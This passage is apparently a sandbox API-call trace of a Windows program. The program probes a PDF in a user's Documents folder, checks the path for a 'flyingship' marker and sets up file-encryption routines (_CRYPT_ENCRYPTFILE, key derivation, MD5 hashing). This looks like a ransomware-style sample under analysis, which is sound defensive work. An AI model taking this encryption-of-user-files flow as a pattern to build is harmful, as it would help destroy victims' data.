Size=0x10) returned 0x9bd858 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0172.303] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8edfa0 [0172.303] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0172.304] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0172.304] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.304] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0x90add8 [0172.305] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.305] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.305] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0x90add8 [0172.306] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0172.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ers\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rs\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Jn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="n0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="S HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=" HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocuments\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cuments\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="uments\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ments\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nts\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="KwBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wBYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BYebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ebiNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="biNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iNhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NhHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hHcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HcjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cjLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="jLML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ML\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Lxb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xb_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="b_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0172.308] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="fXCsV.pdf\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0172.308] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0172.308] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0172.308] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0172.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0172.309] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0172.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.309] PeekMessageW (in: lpMsg=0x87f154, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f154) returned 0 [0172.309] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.309] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KwBYebiNhHcjLML\\Lxb_fXCsV.pdf", lpFindFileData=0x87edb8 | out: lpFindFileData=0x87edb8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f79cf20, ftCreationTime.dwHighDateTime=0x1d5dc3c, ftLastAccessTime.dwLowDateTime=0x786873d0, ftLastAccessTime.dwHighDateTime=0x1d5dbe6, ftLastWriteTime.dwLowDateTime=0x786873d0, ftLastWriteTime.dwHighDateTime=0x1d5dbe6, nFileSizeHigh=0x0, nFileSizeLow=0xe8ff, dwReserved0=0x87ef08, dwReserved1=0x8a7560, cFileName="Lxb_fXCsV.pdf", cAlternateFileName="LXB_FX~1.PDF")) returned 0x90af58 [0172.309] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0172.309] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.309] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.309] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.309] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.310] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0172.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.310] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0172.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0172.310] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.310] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.310] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.310] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.310] PeekMessageW (in: lpMsg=0x87eac4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eac4) returned 0 [0172.310] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.311] CryptAcquireContextA (in: phProv=0x87ea98, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x87ea98*=0x9c0b78) returned 1 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0172.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0172.312] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0172.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.312] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0172.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0172.313] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0172.313] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0172.313] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0172.313] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.313] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0172.313] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0172.313] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0172.313] CryptCreateHash (in: hProv=0x9c0b78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0172.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 